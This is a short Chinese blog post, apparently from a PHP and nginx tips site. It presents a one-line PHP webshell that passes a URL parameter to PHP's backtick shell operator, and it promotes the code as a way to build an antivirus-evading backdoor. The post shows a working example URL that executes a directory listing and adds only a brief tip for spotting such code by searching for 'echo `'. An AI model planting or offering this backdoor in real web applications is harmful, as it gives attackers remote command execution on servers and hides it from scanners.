分析一段PHP恶意代码,可以PHP免杀的一句话后门

分析一段php恶意代码,可以PHP免杀的一句话后门

大家PHP有个可执行符号:` ` ,这个符号是Esc 下面的一个键 感叹号!旁边的,问题就是这个符号。很恐怖的哦。

其实,通过echo `系统命令`; 可以达到system(); 一样的效果

我们看Php恶意代码,

//t.php

$test = $_GET['r']; echo `$test`;

大家看看这个代码有木有问题?$_GET['t']的变量可行了的。这样就可以制作PHP免杀的一句话后门。

http://www.yifen.com / t.php?r=dir 就可以列出目录,其他代码就照样OK滴。

如何查找PHP恶意代码呢,呵呵,通过查找,'echo `' 来查找。

关键词: 恶意代码 , 后门 , php

上一篇: nginx去掉单个目录和多个目录PHP执行权限方法
下一篇: nginx怎么正确的升级新版本,nginx平滑升级的方法

目前还没有人评论,您发表点看法?
发表评论

评论内容 (必填):